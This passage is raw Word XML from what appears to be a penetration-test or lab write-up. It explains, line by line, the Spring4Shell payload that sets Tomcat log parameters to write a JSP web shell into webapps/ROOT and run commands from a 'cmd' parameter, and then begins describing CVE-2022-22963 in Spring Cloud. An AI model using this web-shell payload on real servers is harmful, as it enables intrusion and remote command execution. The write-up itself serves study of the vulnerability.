          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F7645F7" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The payload starts by using the class loader to get access to the runtime environment using the "c2" and "c1" variables. Then it checks if the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" parameter is set to "j" using an "if" statement. If it is, it creates an input stream to run the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" parameter as a command on the server. It then reads the output of the command and sends it back to the attacker through the "out" variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57670678" w14:textId="77777777" w:rsidR="00853BA7" w:rsidRPr="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E6426A" w14:textId="36739AA1" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00853BA7">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Finally, the payload includes several other parameters to specify the location and format of the uploaded JSP web shell, including the file name suffix, directory, prefix, and date format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFFE523" w14:textId="7306309A" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F836953" w14:textId="40B35AE1" w:rsidR="00853BA7" w:rsidRDefault="00853BA7" w:rsidP="00853BA7">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Line for line: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A607C99" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>class.module.classLoader.resources.context.parent.pipeline.first.pattern=:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a parameter for a request that targets the Spring Framework. It sets the pattern for the Tomcat log file to be exploited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298C962" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>%{c2}</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is a special character that tells the server to evaluate the code that comes after it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72793D" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>if("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>j".equals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>"))){</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line checks if the value of the parameter "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" in the request is equal to "j". If it is, then it runs the code inside the curly braces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1DB53" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>java.io.InputStream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream();:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This line runs a command specified in the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" parameter of the request and gets its output as an input stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6067D88A" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>int a = -1;</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line initializes a variable "a" with the value of -1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB1ABA" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>byte[] b = new byte[2048];:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This line initializes a byte array "b" with a size of 2048 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786CF6F5" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>while((a=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>in.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(b))!=-1){ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>out.println</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(new String(b)); }:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This line reads the bytes from the input stream and prints them out to the console until there are no more bytes to read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074B0759" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>}%{suffix}</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line ends the code block that was started with "%{c2}</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64659C00" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&amp;class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line sets the suffix for the uploaded file to ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E8E75" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F115B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&amp;class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line sets the directory for the uploaded file to "webapps/ROOT".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144BEBE8" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F115B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&amp;class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: This line sets the prefix for the uploaded file to "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tomcatwar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA5EF1C" w14:textId="77777777" w:rsidR="004F4F3D" w:rsidRPr="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F115B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>&amp;class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=:</w:t>
      </w:r>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> This line sets the date format for the uploaded file to an empty string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB23917" w14:textId="3B09E76E" w:rsidR="004F4F3D" w:rsidRDefault="004F4F3D" w:rsidP="004F4F3D">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>In simpler terms, this code is a malicious payload that exploits a vulnerability in the Spring Framework to execute remote code on the server. It reads a command from the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" parameter of the request, executes it, and prints the output to the console. It also sets the parameters for uploading a JSP web shell to the server. The uploaded file will have the name "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>tomcatwar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" with a ".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004F4F3D">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>" suffix and will be placed in the "webapps/ROOT" directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051190A9" w14:textId="0DE74A5D" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1C7BC6" w14:textId="3F2E813C" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Can we use it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620C232" w14:textId="0050DBF6" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Now in our case the target does not use a package a war file deployed to a tomcat web server, so we can’t exploit it this way. This the time where we have to take a look at the other vulnerability we found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913108F" w14:textId="57E10BD3" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8F9396" w14:textId="721DDDF2" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED881E0" w14:textId="77777777" w:rsidR="004F115B" w:rsidRPr="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388BDAA8" w14:textId="3271725E" w:rsidR="00D40DC8" w:rsidRPr="00D40DC8" w:rsidRDefault="004F115B" w:rsidP="00D40DC8">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Understanding CVE-2022-22963</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF2D2F" w14:textId="1BC104C6" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56E0E1B7" w14:textId="773617BA" w:rsidR="004F115B" w:rsidRDefault="004F115B" w:rsidP="004F115B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Targets affected by it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71393E37" w14:textId="32210E45" w:rsidR="004F115B" w:rsidRDefault="00C5299B" w:rsidP="004F115B">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Target is using Spring Cloud 3.1.6, 3.2.2 or older unsupported versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582DD2E8" w14:textId="47DB52D8" w:rsidR="005D78BD" w:rsidRDefault="005D78BD" w:rsidP="005D78BD">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Why is it used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44060887" w14:textId="772D2A07" w:rsidR="005D78BD" w:rsidRPr="005D78BD" w:rsidRDefault="005D78BD" w:rsidP="005D78BD">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Spring Boot Framework is used to build standalone java web applications, but to configure those applications to use with the external system or components (databases, messaging systems, authentications systems and </w:t>
      </w:r>
      <w:r w:rsidR="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>APIs)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> we need to use Spring Cloud</w:t>
      </w:r>
      <w:r w:rsidR="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E93830" w:rsidRPr="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Spring Cloud provides a set of tools and libraries that make it easier to integrate and manage these external systems or components in a microservices architecture</w:t>
      </w:r>
      <w:r w:rsidR="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E93830" w:rsidRPr="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>(e.g. configuration management, service discovery, circuit breakers, intelligent routing, micro-proxy, control bus, one-time tokens, global locks, leadership election, distributed sessions, cluster state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4169265D" w14:textId="2F052A5D" w:rsidR="00E93830" w:rsidRDefault="00C5299B" w:rsidP="00E93830">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Target is using the routing functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74370FF8" w14:textId="0D68BC7A" w:rsidR="00E93830" w:rsidRDefault="00E93830" w:rsidP="00E93830">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Why is it used?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06133CEF" w14:textId="1611D6A8" w:rsidR="00E93830" w:rsidRDefault="00E93830" w:rsidP="00E93830">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>The main purpose of the routing functionality is to enable dynamic routing of incoming requests to different services based on configurable rules.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4564954A" w14:textId="4F3B9D8C" w:rsidR="00E93830" w:rsidRDefault="00E93830" w:rsidP="00E93830">
      <w:pPr>
        <w:pStyle w:val="Lijstalinea"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Example of use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F3AEAC" w14:textId="333CBFC1" w:rsidR="00E93830" w:rsidRPr="00E93830" w:rsidRDefault="00E93830" w:rsidP="00E93830">
      <w:pPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Let’s say u have a microservices architecture that includes the next services: user service, product service and order service. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E93830">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
